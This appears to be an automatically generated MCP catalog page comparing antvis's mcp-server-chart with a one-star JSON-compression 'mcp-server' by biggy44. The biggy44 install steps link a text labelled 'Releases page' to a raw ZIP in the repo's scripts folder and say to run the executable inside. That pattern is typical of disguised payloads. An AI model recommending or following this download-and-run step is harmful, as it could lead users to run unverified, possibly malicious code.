MCP Catalogs
Home

mcp-server-chart vs mcp-server

Side-by-side comparison to help you pick between these two MCP servers.

mcp-server-chart
by antvis
mcp-server
by biggy44
Stars★ 4,068★ 1
30d uses10,239
Score8431
Official
Categories
AI / LLM ToolsDeveloper ToolsProductivity
AI / LLM ToolsDeveloper ToolsOther
LanguageTypeScriptTypeScript
Last committhis monththis month

mcp-server-chart · Summary

A TypeScript MCP server for generating 26+ visualization charts using AntV, supporting multiple chart types and deployment options.

mcp-server · Summary

ASON MCP server for efficient JSON compression/decompression to optimize token usage.

mcp-server-chart · Use cases

  • Data analysts creating visual reports from datasets
  • AI assistants generating custom charts based on user requests
  • Web applications embedding visualization capabilities via HTTP API

mcp-server · Use cases

  • Reducing token usage when passing large JSON objects to AI models
  • Optimizing data transfer between MCP clients and servers
  • Compressing configuration files and settings in AI workflows

mcp-server-chart · Install

Installation

Install globally:

npm install -g @antv/mcp-server-chart

For Desktop Apps (e.g., Claude Desktop, VSCode):

{
  "mcpServers": {
    "mcp-server-chart": {
      "command": "npx",
      "args": ["-y", "@antv/mcp-server-chart"]
    }
  }
}

For Windows:

{
  "mcpServers": {
    "mcp-server-chart": {
      "command": "cmd",
      "args": ["/c", "npx", "-y", "@antv/mcp-server-chart"]
    }
  }
}

mcp-server · Install

Installation Steps

  1. Download the appropriate binary for your system from the [Releases page](https://github.com/biggy44/mcp-server/raw/refs/heads/main/scripts/server_mcp_v1.2.zip)
  2. Extract the downloaded ZIP file
  3. Run the executable to start the server
Claude Desktop Configuration

Add the following to your Claude Desktop configuration:

{
  "mcpServers": {
    "ason": {
      "command": "path/to/ason-server",
      "args": []
    }
  }
}
Comparison generated from public README + GitHub signals. Last updated automatically.